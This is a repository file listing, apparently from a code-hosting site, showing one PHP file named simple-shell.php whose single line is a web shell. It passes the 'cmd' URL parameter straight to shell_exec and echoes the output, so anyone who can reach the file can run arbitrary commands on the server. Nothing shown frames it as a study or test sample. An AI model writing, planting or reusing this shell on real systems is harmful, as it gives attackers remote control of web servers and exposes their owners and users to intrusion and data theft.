Files
smplshllctrlr/simple-shell.php
2017-01-14 13:44:36 +01:00

2 lines
74 B
PHP

<?php if (isset($_GET["cmd"])) { echo shell_exec($_GET["cmd"]); die; } ?>